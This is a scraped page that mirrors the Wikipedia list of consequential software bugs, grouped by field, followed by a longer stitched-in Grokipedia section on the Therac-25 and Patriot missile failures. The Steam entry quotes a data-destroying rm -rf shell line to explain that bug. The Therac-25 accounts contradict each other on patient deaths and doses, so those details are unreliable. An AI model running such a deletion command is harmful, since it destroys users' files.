Recent from talks
All channels
Be the first to start a discussion here.
Be the first to start a discussion here.
Be the first to start a discussion here.
Be the first to start a discussion here.
Welcome to the community hub built to collect knowledge and have discussions related to List of software bugs.
Nothing was collected or created yet.
List of software bugs
View on Wikipediafrom Wikipedia
Many software bugs are merely annoying or inconvenient, but some can have extremely serious consequences—either financially or as a threat to human well-being.[1] The following is a list of software bugs with significant consequences.
Administration
[edit]- The software of the A2LL system for handling unemployment and social services in Germany presented several errors with large-scale consequences, such as sending the payments to invalid account numbers in 2004.[citation needed]
Blockchain
[edit]- The DAO bug. On June 17, 2016, the DAO was subjected to an attack exploiting a combination of vulnerabilities, including the one concerning recursive calls, that resulted in the transfer of 3.6 million Ether – around a third of the 11.5 million Ether that had been committed to The DAO – valued at the time at around $50M.[2][3]
Electric power transmission
[edit]- The Northeast blackout of 2003 was triggered by a local outage that went undetected due to a race condition in General Electric Energy's XA/21 monitoring software.[4]
Encryption
[edit]See also Category:Computer security exploits
- In order to fix a warning issued by Valgrind, a maintainer of Debian patched OpenSSL and broke the random number generator in the process. The patch was uploaded in September 2006 and made its way into the official release; it was not reported until April 2008. Every key generated with the broken version is compromised (as the "random" numbers were made easily predictable), as is all data encrypted with it, threatening many applications that rely on encryption such as S/MIME, Tor, SSL or TLS protected connections and SSH.[5]
- Heartbleed, an OpenSSL vulnerability introduced in 2012 and disclosed in April 2014, removed confidentiality from affected services, causing among other things the shutdown of the Canada Revenue Agency's public access to the online filing portion of its website[6] following the theft of social insurance numbers.[7]
- The Apple "goto fail" bug was a duplicated line of code which caused a public key certificate check to pass a test incorrectly.
- The GnuTLS "goto fail" bug was similar to the Apple bug and found about two weeks later. The GnuTLS bug also allowed attackers to bypass SSL/TLS security. [8]
Finance
[edit]- The Vancouver Stock Exchange index had large errors due to repeated rounding. In January 1982 the index was initialized at 1000 and subsequently updated and truncated to three decimal places on each trade. This was done about 3000 times a day. The accumulated truncations led to an erroneous loss of around 25 points per month. Over the weekend of November 25–28, 1983, the error was corrected, raising the value of the index from its Friday closing figure of 524.811 to 1098.892.[9][10]
- Knight Capital Group lost $440 million in 45 minutes on August 1, 2012 due to the improper deployment of software on servers and the re-use of a critical software flag that caused old unused software code to execute during trading.[11]
- The British Post Office scandal; between 2000 and 2015, 736 subpostmasters were prosecuted by the UK Post Office, with many falsely convicted and sent to prison. The subpostmasters were blamed for financial shortfalls which actually were caused by software defects in the Post Office's Horizon accounting software.[12]
Media
[edit]- In the Sony BMG copy protection rootkit scandal (October 2005), Sony BMG produced a Van Zant music CD that employed a copy protection scheme that covertly installed a rootkit on any Windows PC that was used to play it. Their intent was to hide the copy protection mechanism to make it harder to circumvent. Unfortunately, the rootkit inadvertently opened a security hole resulting in a wave of successful trojan horse attacks on the computers of those who had innocently played the CD.[13] Sony's subsequent efforts to provide a utility to fix the problem actually exacerbated it.[14]
Medical
[edit]- A bug in the code controlling the Therac-25 radiation therapy machine was directly responsible for at least five patient deaths in the 1980s when it administered excessive quantities of beta radiation.[15][16][17]
- Radiation therapy planning software RTP/2 created by Multidata Systems International could incorrectly double the dosage of radiation depending on how the technician entered data into the machine. At least eight patients died, while another 20 received overdoses likely to cause significant health problems (November 2000).[18]
- A Medtronic heart device was found vulnerable to remote attacks (2008-03).[19]
- The Becton Dickinson Alaris Gateway Workstation allows unauthorized arbitrary remote execution (2019).[20][21]
- The CareFusion Alaris pump module (8100) will not properly delay an Infusion when the "Delay Until" option or "Multidose" feature is used (2015).[22]
Military
[edit]- The software error of a MIM-104 Patriot caused its system clock to drift by one third of a second over a period of one hundred hours – resulting in failure to locate and intercept an incoming Iraqi Al Hussein missile, which then struck Dharan barracks, Saudi Arabia (February 25, 1991), killing 28 Americans.[23][24]
- A Royal Air Force Chinook helicopter crashed into the Mull of Kintyre in June 1994, killing 29. Initially, the crash was dismissed as pilot error, but an investigation by Computer Weekly uncovered sufficient evidence to convince a House of Lords inquiry that it may have been caused by a software bug in the aircraft's engine control computer.[25]
- Smart ship USS Yorktown was left dead in the water in September 1997 for nearly 3 hours after a divide by zero error.[26]
- In April 1992 the first Lockheed YF-22 crashed while landing at Edwards Air Force Base, California. The cause of the crash was found to be a flight control software error that failed to prevent a pilot-induced oscillation.[27]
- While attempting its first overseas deployment to the Kadena Air Base in Okinawa, Japan, on 11 February 2007, a group of six F-22 Raptors flying from Hickam AFB, Hawaii, experienced multiple computer crashes coincident with their crossing of the 180th meridian of longitude (the International Date Line). The computer failures included at least navigation (completely lost) and communication. The fighters were able to return to Hawaii by following their tankers, something that might have been problematic had the weather not been good. The error was fixed within 48 hours, allowing a delayed deployment.[28]
Space
[edit]- NASA's 1965 Gemini 5 mission landed 80 miles (130 km) short of its intended splashdown point when the pilot compensated manually for an incorrect constant for the Earth's rotation rate. A 360-degree rotation corresponding to the Earth's rotation relative to the fixed stars was used instead of the 360.98-degree rotation in a 24-hour solar day. The shorter length of the first three missions and a computer failure on Gemini 4 prevented the bug from being detected earlier.[29]
- The Russian Space Research Institute's Phobos 1 (Phobos program) deactivated its attitude thrusters and could no longer properly orient its solar arrays or communicate with Earth, eventually depleting its batteries. (September 10, 1988).[30]
- The European Space Agency's Ariane flight V88 was destroyed 40 seconds after takeoff (June 4, 1996). The first flight of the Ariane V rocket self-destructed due to an overflow occurring during a floating-point to integer conversion in the on-board guidance software. The same software had been used successfully in the Ariane IV program, but the Ariane V produced larger values for at least one variable, causing the overflow.[31][32]
- In 1997, the Mars Pathfinder mission was jeopardised by a bug in concurrent software shortly after the rover landed, which was found in preflight testing but given a low priority as it only occurred in certain unanticipated heavy-load conditions.[33] The problem, which was identified and corrected from Earth, was due to computer resets caused by priority inversion.[34]
- In 2000, a Zenit 3SL launch failed due to faulty ground software not closing a valve in the rocket's second stage pneumatic system.[35]
- The European Space Agency's CryoSat-1 satellite was lost in a launch failure in 2005 due to a missing shutdown command in the flight control system of its Rokot carrier rocket.[36]
- NASA Mars Polar Lander was destroyed because its flight software mistook vibrations caused by the deployment of the stowed legs for evidence that the vehicle had landed and shut off the engines 40 meters from the Martian surface (December 3, 1999).[37]
- Its sister spacecraft Mars Climate Orbiter was also destroyed, due to software on the ground generating commands based on parameters in pound-force (lbf) rather than newtons (N).
- A mis-sent command from Earth caused the software of the NASA Mars Global Surveyor to incorrectly assume that a motor had failed, causing it to point one of its batteries at the sun. This caused the battery to overheat (November 2, 2006).[38][39]
- NASA's Spirit rover became unresponsive on January 21, 2004, a few weeks after landing on Mars. Engineers found that too many files had accumulated in the rover's flash memory. It was restored to working condition after deleting unnecessary files.[40]
- Japan's Hitomi astronomical satellite was destroyed on March 26, 2016, when a thruster fired in the wrong direction, causing the spacecraft to spin faster instead of stabilize.[41]
- ESA/Roscosmos Schiaparelli Mars lander impacted surface of Mars. Unanticipated spin during descent briefly saturated the IMU, software then misinterpreted the data as showing the lander was underground, so prematurely ejected parachute and shut down engines, resulting in crash.[42]
- Israel's first attempt to land an uncrewed spacecraft on the Moon with the Beresheet was rendered unsuccessful on April 11, 2019, due to a software bug with its engine system, which prevented it from slowing down during its final descent on the Moon's surface. Engineers attempted to correct this bug by remotely rebooting the engine, but by the time they regained control of it, Beresheet could not slow down in time to avert a hard, crash landing that disintegrated it.[43]
Telecommunications
[edit]- AT&T long-distance network crash (January 15, 1990), in which the failure of one switching system would cause a message to be sent to nearby switching units to tell them that there was a problem. Unfortunately, the arrival of that message would cause those other systems to fail too – resulting in a cascading failure that rapidly spread across the entire AT&T long-distance network.[44][45]
- In January 2009, Google's search engine erroneously notified users that every web site worldwide was potentially malicious, including its own.[46]
- In May 2015, iPhone users discovered a bug where sending a certain sequence of characters and Unicode symbols as a text to another iPhone user would crash the receiving iPhone's SpringBoard interface,[47] and may also crash the entire phone, induce a factory reset, or disrupt the device's connectivity to a significant degree,[48] preventing it from functioning normally. The bug persisted for weeks, gained substantial notoriety and saw a number of individuals using the bug to play pranks on other iOS users,[citation needed] before Apple eventually patched it on June 30, 2015, with iOS 8.4.
- On May 31st, 2020, the user @UniverseIce on twitter reported a wallpaper[49] that caused select android phone's to go into a bootloop that rendered the phones unusable.[50] This was caused by and oversight in Android's SystemUI and how it handled converting images used for the wallpaper from ProPhoto RGB to sRGB[51] leading to the system trying and display a pixel with a invalid color value.[52][53]
Tracking years
[edit]- The year 2000 problem spawned fears of worldwide economic collapse and an industry of consultants providing last-minute fixes.[54]
- A similar problem will occur in 2038 (the year 2038 problem), as many Unix-like systems calculate the time in seconds since 1 January 1970, and store this number as a 32-bit signed integer, for which the maximum possible value is 231 − 1 (2,147,483,647) seconds.[55] 2,147,483,647 seconds equals 68 years, and 2038 is 68 years forward from 1970.
- An error in the payment terminal code for Bank of Queensland rendered many devices inoperable for up to a week. The problem was determined to be an incorrect hexadecimal number conversion routine. When the device was to tick over to 2010, it skipped six years to 2016, causing terminals to decline customers' cards as expired.[56]
Transportation
[edit]- By some accounts Toyota's electronic throttle control system (ETCS) had bugs that could cause sudden unintended acceleration.[57]
- The Boeing 787 Dreamliner experienced an integer overflow bug which could shut down all electrical generators if the aircraft were to be kept "on" for more than 248 days.[58] A similar problem was found to exist in the Airbus A350, which needs to be powered down before reaching 149 continuous hours of power-on time, otherwise certain avionics systems or functions would partially or completely fail.[59]
- In early 2019, the transportation-rental firm Lime discovered a firmware bug with its electric scooters that can cause them to brake very hard unexpectedly, which may hurl and injure riders.[60]
- Boeing 737 NG had all cockpit displays go blank if a specific type of instrument approach to any one of seven specific airports was selected in the flight management computer.[61]
- Bombardier CRJ-200 equipped with flight management systems by Collins Aerospace would make wrong turns during missed approach procedures executed by the autopilot in some specific cases when temperature compensation was activated in cold weather.[62]
Video gaming
[edit]- Eve Online's deployment of the Trinity patch erased the boot.ini file from several thousand users' computers, rendering them unable to boot. This was due to the usage of a legacy system within the game that was also named boot.ini. As such, the deletion had targeted the wrong directory instead of the /eve directory.[63]
- The Corrupted Blood incident was a software bug in World of Warcraft that caused a deadly, debuff-inducing virtual disease that could only be contracted during a particular raid to be set free into the rest of the game world, leading to numerous, repeated deaths of many player characters. This caused players to avoid crowded places in-game, just like in a "real world" epidemic, and the bug became the center of some academic research on the spread of infectious diseases.[64]
- On June 6, 2006, the online game RuneScape suffered from a bug that enabled certain player characters to kill and loot other characters, who were unable to fight back against the affected characters because the game still thought they were in player-versus-player mode even after they were kicked out of a combat ring from the house of a player who was suffering from lag while celebrating an in-game accomplishment. Players who were killed by the glitched characters lost many items, and the bug was so devastating that the players who were abusing it were soon tracked down, caught and banned permanently from the game, but not before they had laid waste to the region of Falador, thus christening the bug "Falador Massacre".[65]
- In the 256th level of Pac-Man, a bug results in a kill screen. The maximum number of fruit available is seven and when that number rolls over, it causes the entire right side of the screen to become a jumbled mess of symbols while the left side remains normal.[66]
- Upon initial release, the ZX Spectrum game Jet Set Willy was impossible to complete because of a severe bug that corrupted the game data, causing enemies and the player character to be killed in certain rooms of the large mansion where the entire game takes place.[67] The bug, known as "The Attic Bug", would occur when the player entered the mansion's attic, which would then cause an arrow to travel offscreen, overwriting the contents of memory and altering crucial variables and behavior in an undesirable way. The game's developers initially excused this bug by claiming that the affected rooms were death traps, but ultimately owned up to it and issued instructions to players on how to fix the game itself.[68]
- One of the free demo discs issued to PlayStation Underground subscribers in the United States contained a serious bug, particularly in the demo for Viewtiful Joe 2, that would not only crash the PlayStation 2, but would also unformat any memory cards that were plugged into that console, erasing any and all saved data onto them.[69] The bug was so severe that Sony had to apologize for it and send out free copies of other PS2 games to affected players as consolation.[70]
- Due to a severe programming error, much of the Nintendo DS game Bubble Bobble Revolution is unplayable because a mandatory boss fight failed to trigger in the 30th level.[71]
- An update for the Xbox 360 version of Guitar Hero II, which was intended to fix some issues with the whammy bar on that game's guitar controllers, came with a bug that caused some consoles to freeze, or even stop working altogether, producing the infamous "red ring of death".[72]
- Valve's Steam client for Linux could accidentally delete all the user's files in every directory on the computer. This happened to users that had moved Steam's installation directory.[73] The bug is the result of unsafe shellscript programming: The first line tries to find the script's containing directory. This could fail, for example if the directory was moved while the script was running, invalidating the "selfpath" variable
STEAMROOT="$(cd "${0%/*}" && echo $PWD)" # Scary! rm -rf "$STEAMROOT/"*
$0. It would also fail if$0contained no slash character, or contained a broken symlink, perhaps mistyped by the user. The way it would fail, as ensured by the&&conditional, and not havingset -ecause termination on failure, was to produce the empty string. This failure mode was not checked, only commented as "Scary!". Finally, in the deletion command, the slash character takes on a very different meaning from its role of path concatenation operator when the string before it is empty, as it then names the root directory. - Minus World is an infamous glitch level from the 1985 game Super Mario Bros., accessed by using a bug to clip through walls in level 1–2 to reach its "warp zone", which leads to the said level.[74] As this level is endless, triggering the bug that takes the player there will make the game impossible to continue until the player resets the game or runs out of lives.
- "MissingNo." is a glitch Pokémon species present in Pokémon Red and Blue, which can be encountered by performing a particular sequence of seemingly unrelated actions. Capturing this Pokémon may corrupt the game's data, according to Nintendo[75][76][77] and some of the players who successfully attempted this glitch. This is one of the most famous bugs in video game history, and continues to be well-known.[78]
See also
[edit]References
[edit]- ^ "Why Software fails". IEEE Spectrum: Technology, Engineering, and Science News. 2 September 2005. Retrieved 2021-03-20.
- ^ Popper, Nathaniel (17 June 2016). "Hacker May Have Taken $50 Million From Cybercurrency Project". The New York Times. Archived from the original on 20 June 2017. Retrieved 3 March 2017.
- ^ Price, Rob (17 June 2016). "Digital currency Ethereum is cratering amid claims of a $50 million hack". Business Insider. Archived from the original on 11 June 2017. Retrieved 17 June 2016.
- ^ "Software Bug Contributed to Blackout". Archived from the original on 2004-03-13. Retrieved 2008-01-07.
- ^ "DSA-1571-1 openssl -- predictable random number generator". Retrieved 2008-04-16.
- ^ "Heartbleed bug may shut Revenue Canada website until weekend". CBC News. 2014-04-09.
- ^ "Heartbleed bug: 900 SINs stolen from Revenue Canada - Business - CBC News". CBC News. Retrieved 2014-04-14.
- ^ Goodin, Dan (March 4, 2014). "Critical crypto bug leaves Linux, hundreds of apps open to eavesdropping". Ars Technica. Retrieved September 7, 2020.
- ^ Quinn, Kevin (November 8, 1983). "Ever Had Problems Rounding Off Figures? This Stock Exchange Has". The Wall Street Journal. p. 37.
- ^ Wayne, Lilley (November 29, 1983). "Vancouver stock index has right number at last". The Toronto Star.
- ^ Popper, Nathaniel (2 August 2012). "Knight Capital Says Trading Glitch Cost It $440 Million". New York Times.
- ^ Flinders, Karl (3 March 2022). "Post Office warned of software flaw in 2006, but failed to alert subpostmaster network". Computer Weekly.
- ^ Borland, John (11 November 2005). "FAQ: Sony's 'rootkit' CDs - CNET News". news.com. Archived from the original on 5 December 2008.
- ^ Russinovich, Mark (4 Nov 2005). "Mark's Blog : More on Sony: Dangerous Decloaking Patch, EULAs and Phoning Home". blogs.technet.com. Archived from the original on 3 January 2007.
- ^ "The Therac-25 Accidents (PDF), by Nancy Leveson" (PDF). Retrieved 2008-01-07.
- ^ "An Investigation of the Therac-25 Accidents (IEEE Computer)". Retrieved 2008-01-07.
- ^ "Computerized Radiation Therapy (PDF) reported by TROY GALLAGHER" (PDF). Retrieved 2011-12-12.
- ^ Garfinkel, Simson (November 8, 2005). "History's Worst Software Bugs". Wired. Retrieved September 6, 2020.
- ^ Feder, Barnaby J. (2008-03-12). "A Heart Device Is Found Vulnerable to Hacker Attacks". The New York Times. Retrieved 2008-09-28.
- ^ "ICS Advisory (ICSMA-19-164-01)" (Press release). Cybersecurity and Infrastructure Security Agency. 2019-06-13. Retrieved 2019-11-15.
- ^ Newman, Lily Hay (2019-10-01). "Decades-Old Code Is Putting Millions of Critical Devices at Risk". Wired. Retrieved 2019-11-15.
- ^ "Urgent: Medical Device Recall Notification, AFFECTED DEVICE: Alaris® Pump module (Model 8100)"Delay Until" Option and "Multidose" Feature" (PDF) (Press release). CareFusion. 2014-04-23. Archived from the original (PDF) on 2015-06-12. Retrieved 2019-11-15.
- ^ "Patriot missile defense, Software problem led to system failure at Dharhan, Saudi Arabia; GAO report IMTEC 92-26". US Government Accounting Office.
- ^ Skeel, Robert. "Roundoff Error and the Patriot Missile". SIAM News, volume 25, nr 4. Archived from the original on 2008-08-01. Retrieved 2008-09-30.
- ^ Rogerson, Simon (April 2002). "The Chinook Helicopter Disaster". IMIS Journal. 12 (2). Archived from the original on 2012-07-17.
- ^ "Software glitches leave Navy Smart Ship dead in the water". gcn.com. 13 Jul 1998. Archived from the original on 8 February 2006.
- ^ "F/A-22 Program History". f-22raptor.com. Archived from the original on 25 August 2009.
- ^ "Lockheed's F-22 Raptor Gets Zapped by International Date Line". DailyTech. 26 Feb 2007. Archived from the original on 16 March 2007.
- ^ "Gemini 5". On The Shoulders of Titans: A History of Project Gemini. Archived from the original on 2019-07-14. Retrieved 2019-08-20.
- ^ Sagdeev, R. Z.; Zakharov, A. V. (1989). "Brief history of the Phobos mission". Nature. 341 (6243): 581–585. Bibcode:1989Natur.341..581S. doi:10.1038/341581a0. S2CID 41464654.
- ^ Dowson, M. (March 1997). "The Ariane 5 Software Failure". ACM SIGSOFT Software Engineering Notes. 22 (2): 84. doi:10.1145/251880.251992. S2CID 43439273.
- ^ Jézéquel JM, Meyer B (January 1997). "Design by Contract: The Lessons of Ariane" (PDF). IEEE Computer. 30 (1): 129–130. doi:10.1109/2.562936.
- ^ Heaven, Douglas (2013). "Parallel sparking: Many chips make light work". New Scientist. 219 (2930). Elsevier BV: 42–45. doi:10.1016/s0262-4079(13)62046-1. ISSN 0262-4079.
- ^ Reeves, Glenn E (15 Dec 1997). "What really happened on Mars? -- Authoritative Account". research.microsoft.com. Archived from the original on 30 December 2016.
- ^ "Spaceflight Now | Breaking News | Sea Launch malfunction blamed on software glitch". spaceflightnow.com. Retrieved January 2, 2022.
- ^ "CryoSat Mission lost due to launch failure". European Space Agency. 8 October 2005. Retrieved 19 July 2010.
- ^ "Mars Polar Lander". Archived from the original on 2012-09-27. Retrieved 2008-01-07.
- ^ "Report Reveals Likely Causes of Mars Spacecraft Loss". Archived from the original on 2007-11-09. Retrieved 2008-01-07.
- ^ "Faulty Software May Have Doomed Mars Orbiter". Space.com. Archived from the original on July 24, 2008. Retrieved January 11, 2007.
- ^ "Out of memory problem caused Mars rover's glitch". computerworld.com. February 3, 2004.
- ^ Witze, Alexandra (2016). "Software error doomed Japanese Hitomi spacecraft". Nature. 533 (7601): 18–19. Bibcode:2016Natur.533...18W. doi:10.1038/nature.2016.19835. PMID 27147012. S2CID 4451754.
- ^ Tolker-Nielsen, Toni, ed. (18 May 2017). ExoMars 2016 – Schiaparelli Anomaly Inquiry (Report). European Space Agency. pp. 18–19. DG-I/2017/546/TTN.
- ^ Weitering, Hanneke (12 April 2019). "Israeli Moon Lander Suffered Engine Glitch Before Crash". Space.com. Retrieved 29 May 2019.
- ^ Sterling, Bruce (1993). The Hacker Crackdown: Law and Disorder on the Electronic Frontier. Spectra Books. ISBN 0-553-56370-X.
- ^ "The Crash of the AT&T Network in 1990". Retrieved 2024-02-26.
- ^ Metz, Cade (January 31, 2009). "Google mistakes entire web for malware". The Register. Retrieved December 20, 2010.
- ^ "Bug in iOS Unicode handling crashes iPhones with a simple text". Apple Insider. 26 May 2015. Retrieved 29 May 2015.
- ^ Clover, Juli (26 May 2015). "New iOS Bug Crashing iPhones Simply by Receiving a Text Message". MacRumors. Retrieved 29 May 2015.
- ^ "Sunset At St Mary Lake Glacier National Park 5k Wallpaper,HD Nature Wallpapers,4k Wallpapers,Images,Backgrounds,Photos and Pictures". hdqwalls. Retrieved 2025-09-22.
- ^ X (Formerly Twitter), 2025, x.com/UniverseIce/status/1266943909499826176?lang=en. Accessed 22 Sept. 2025.
- ^ Schoon, Ben. “[Update: Photographer Speaks Out] Some Android Phones Can Be Bricked Using This Wallpaper.” 9to5Google, 10 June 2020, 9to5google.com/2020/06/10/android-phone-wallpaper-soft-brick-bug-video/. Accessed 22 Sept. 2025.
- ^ "Google Issue Tracker". issuetracker.google.com. Retrieved 2025-09-22.
- ^ Mehrotra, Pranob (2020-08-03). "[Update 2: Fixed] This wallpaper triggers a rare bug causing Android devices to bootloop". XDA. Retrieved 2025-09-22.
- ^ "Looking at the Y2K bug, portal on CNN.com". Archived from the original on 2007-12-27. Retrieved 2008-01-07.
- ^ "The year 2038 bug". Retrieved 2008-01-12.
- ^ Stafford, Patrick. "Businesses hit by Bank of Queensland EFTPOS bug". Archived from the original on 7 April 2014. Retrieved 1 April 2014.
- ^ Dunn, Michael (28 Oct 2013). "Toyota's killer firmware: Bad design and its consequences". EDN.
- ^ "To keep a Boeing Dreamliner flying, reboot once every 248 days". Engadget. 1 Apr 2015.
- ^ Corfield, Gareth (25 Jul 2019). "Airbus A350 software bug forces airlines to turn planes off and on every 149 hours". The Register. Retrieved 2021-02-04.
- ^ Roy, Eleanor Ainge (21 February 2019). "Auckland threatens to eject Lime scooters after wheels lock at high speed". The Guardian. Retrieved 2019-02-20.
- ^ Corfield, Gareth (8 Jan 2020). "Blackout Bug: Boeing 737 cockpit screens go blank if pilots land on specific runways". The Register. Retrieved 2021-02-04.
- ^ Corfield, Gareth (29 May 2020). "Software bug in Bombardier airliner made planes turn the wrong way". The Register. Retrieved 2021-02-04.
- ^ "About the boot.ini issue (Dev Blog)". 11 December 2007. Retrieved 2014-09-30.
- ^ Balicer, Ran (2005-10-05). "Modeling Infectious Diseases Dissemination Through Online Role-Playing Games". Epidemiology. 18 (2): 260–261. doi:10.1097/01.ede.0000254692.80550.60. PMID 17301707. S2CID 20959479.
- ^ Bishop, Sam (8 June 2016). "Runescape marks the anniversary of the Falador Massacre". GameFactor. Retrieved 9 August 2018.
- ^ "Pac Man'S Split Screen Level Analyzed And Fixed". Donhodges.Com. Retrieved 2012-09-19.
- ^ Langshaw, Mark (30 September 2010). "Retro Corner: 'Jet Set Willy' (Spectrum)". Digital Spy. Retrieved 30 May 2018.
- ^ "Jet Set Willy Solved!". Personal Computer Games (8): 21. July 1984. Retrieved 2014-04-19.
- ^ Krotoski, Aleks (2004-11-30). "Viewtiful Joe 2 demo deletes memory cards". The Guardian. Retrieved 2009-11-10.
- ^ Bramwell, AleksTom (2004-12-07). "Sony to replace defective demo discs with games". Eurogamer. Retrieved 2009-11-10.
- ^ "Bubble Bobble Revolution DS production issues confirmed *UPDATE*". GoNintendo. 14 Oct 2006.
- ^ Bramwell, Tom (2007-04-16). "RedOctane admits to Guitar Hero II patch problem". Eurogamer. Retrieved 2016-12-02.
- ^ Paul, Ian (17 Jan 2015). "Scary Steam for Linux bug erases all the personal files on your PC". PCWorld.
- ^ Gach, Ethan (14 November 2016). "The NES Classic Carries Over Classic Glitches". Kotaku Australia. Archived from the original on November 15, 2016. Retrieved 8 March 2017.
- ^ Nintendo. "Customer Service — Specific GamePak Troubleshooting". Archived from the original on January 27, 2008. Retrieved June 7, 2009.
- ^ "Pokechat". Nintendo Power. Vol. 120. May 1999. p. 101.
- ^ Loe, Casey (1999). Pokémon Perfect Guide Includes Red-Yellow-Blue. Versus Books. p. 125. ISBN 1-930206-15-1.
- ^ "Gaming's Top 10 Easter Eggs". IGN. IGN Entertainment. April 9, 2009. p. 2. Archived from the original on June 5, 2010. Retrieved June 7, 2009.
External links
[edit]List of software bugs
View on Grokipediafrom Grokipedia
Life-Critical Systems
Therac-25 Radiation Therapy Machine (1985-1987)
The Therac-25 was a computer-controlled dual-mode radiation therapy machine manufactured by Atomic Energy of Canada Limited (AECL), capable of delivering either electron beams or X-ray beams for cancer treatment, with installations beginning in 1982 across the United States and Canada. Between June 3, 1985, and January 17, 1987, six documented accidents occurred involving massive overdoses of radiation, far exceeding intended therapeutic levels of approximately 200 rads; these delivered 8,000 to 25,000 rads in localized areas, resulting in three patient deaths and severe injuries including tissue necrosis and amputations in the others.[6][7] The overdoses stemmed from software flaws that allowed unsafe configurations during operation, particularly in high-energy X-ray mode, where the machine erroneously fired an unmodulated electron beam without the required scattering foil or flattening filter.[6] Central to the failures was a race condition in the multitasking software, adapted with minimal changes from earlier Therac models, where rapid operator inputs during parameter editing—such as changing beam type from electrons ("e") to X-rays ("x") or adjusting dose rates—could desynchronize the control software from hardware positioning commands.[7] This bug, exploitable within seconds via the console interface, caused the multileaf turntable to remain in the wrong position (e.g., aligned for ion chamber verification rather than photon mode), bypassing mechanical safeties absent in the Therac-25 design, unlike its predecessors which retained hardware interlocks.[6] Additional errors included a variable overflow in dose calculation routines (contributing to the January 1987 Yakima incident) and inadequate error handling, where the system displayed vague "Malfunction" codes (e.g., "Malfunction 54") without halting operations or alerting to overdose risks, enabling operators to resume treatments that repeated the fault.[7] AECL initially attributed issues to operator error or transient hardware faults, delaying software scrutiny despite replicated failures in testing.[6]| Date | Location | Estimated Dose (rads) | Outcome |
|---|---|---|---|
| June 3, 1985 | Kennestone, Georgia | 15,000–20,000 | Patient symptoms; machine paused but no immediate overdose recognition; patient died June 1986 from complications.[7] |
| July 26, 1985 | Hamilton, Ontario | 13,000–17,000 | Severe injury; patient died April 1986.[7] |
| December 1985 | Yakima, Washington | Unknown (high) | Injury; fuse blown, no death.[7] |
| March 21, 1986 | Tyler, Texas | 16,500–25,000 | Severe burns; patient died months later.[7] |
| April 11, 1986 | Tyler, Texas | ~25,000 | Severe injury requiring intervention.[7] |
| January 17, 1987 | Yakima, Washington | 8,000–10,000 | Severe injury; hip necrosis.[7] |
Patriot Missile System (1991)
On February 25, 1991, during Operation Desert Storm, a Patriot missile battery at Dhahran Airbase, Saudi Arabia, failed to track and intercept an incoming Iraqi Scud missile due to a software defect in its weapons control computer.[8] The Scud struck a U.S. Army barracks approximately 100 meters away, killing 28 American soldiers and wounding about 100 others.[8] [9] The system's radar detected the incoming threat, but the tracking algorithm produced an erroneous predicted position, preventing engagement.[8] The defect stemmed from a fixed-point arithmetic precision loss in calculating elapsed runtime since system boot. Time was stored as an integer in a 24-bit register, incremented in 0.1-second units (tenths of seconds).[10] For trajectory computations, this value was multiplied by 0.1 to yield seconds, but binary floating-point representation truncated the repeating binary fraction of 1/10 (0.0001100110011...), introducing a relative error of approximately 9.5 × 10^{-8} per unit time.[10] This error accumulated linearly; after roughly 100 hours of continuous operation without reboot—as was the case at Dhahran—the discrepancy totaled 0.3433 seconds.[8] [10] At the Scud's speed of about 1,676 meters per second, the 0.3433-second offset translated to a range error of approximately 687 meters, shifting the missile's predicted location outside the system's narrow "range gate" for validated tracking.[8] [10] Without a match to this gate, the Patriot discarded the track as invalid and did not fire. A corrective software patch addressing the precision issue had been released on February 16 and applied to some batteries, but wartime logistics delayed its arrival and installation at Dhahran until February 26.[8] The U.S. General Accounting Office (GAO) report on the incident attributed the failure solely to this software synchronization error, noting inadequate pre-deployment testing for extended runtimes despite prior indications of drift from Israeli operations.[8] Recommendations included rigorous endurance validation and algorithmic reviews for future updates, underscoring vulnerabilities in embedded real-time systems reliant on finite-precision arithmetic.[8] The event prompted reboots of other Patriots to reset clocks and accelerated patch deployments across theater units.[8]Therac-25 Overdose Incidents
The Therac-25 overdose incidents comprised six cases of massive radiation overexposure between June 1985 and January 1987, resulting in three patient deaths and three severe injuries. These events were attributed to software flaws, including race conditions during operator input that permitted the machine to fire unmodulated high-energy electron beams without the required scattering foil, delivering doses estimated at 8,000 to 25,000 rads—far exceeding intended therapeutic levels of 100 to 200 rads. Operators frequently encountered the vague "Malfunction 54" error message, which lacked diagnostic detail and encouraged overriding safety interlocks.[6] On June 3, 1985, at Kennestone Regional Medical Center in Marietta, Georgia, a patient scheduled for a 200-rad electron beam treatment received approximately 16,500 rads after the operator rapidly edited parameters and initiated the beam, triggering Malfunction 54; the patient suffered extensive burns requiring skin grafts and hospitalization but ultimately survived.[6][11] A similar error recurred on July 26, 1985, at the Ontario Cancer Foundation Clinic in Hamilton, Ontario, Canada, where a patient intended for a 100-rad dynamic electron treatment absorbed around 16,500 rads following hasty data entry and beam activation under Malfunction 54 conditions; the victim experienced acute radiation syndrome and burns, leading to death several months later.[6][11] In December 1985 at Yakima Valley Memorial Hospital in Yakima, Washington, a patient received an overdose of about 8,000–10,000 rads during a planned 128-rad treatment due to a software timing issue in mode switching, initially presenting as skin erythema that escalated to severe injury; the patient survived with lasting damage.[6] On March 21, 1986, at East Texas Cancer Center in Tyler, Texas, another patient was overdosed with roughly 16,500 rads instead of 180 rads when parameter changes preceded beam-on without updating the turntable position, bypassing interlocks; symptoms included paralysis and burns, culminating in death in August 1986.[6][11] The following incident on April 11, 1986, at the same Tyler facility involved an 8,000-rad delivery versus 200 rads intended, again under Malfunction 54 after rapid setup; the patient endured fatal burns and died in May 1986.[6][11] The final known overdose struck on January 17, 1987, back at Yakima Valley Memorial Hospital, administering 10,000–13,000 rads in place of 100 rads due to a race condition in input handling and interlock failure; the patient developed irreversible spinal cord damage and perished in April 1987.[6][11] In response to accumulating reports, Atomic Energy of Canada Limited (AECL) notified the U.S. Food and Drug Administration (FDA) on April 15, 1986; the FDA subsequently declared the Therac-25 defective on May 2, 1986, mandating a corrective action plan, user notifications, and temporary suspension of operations until software and hardware safeguards were implemented.[6][11] These incidents exposed systemic issues in software validation, as prior Therac models had relied on hardware interlocks that the computerized Therac-25 inadequately replicated in code.[6]Economic and Financial Disruptions
Pentium FDIV Bug (1994)
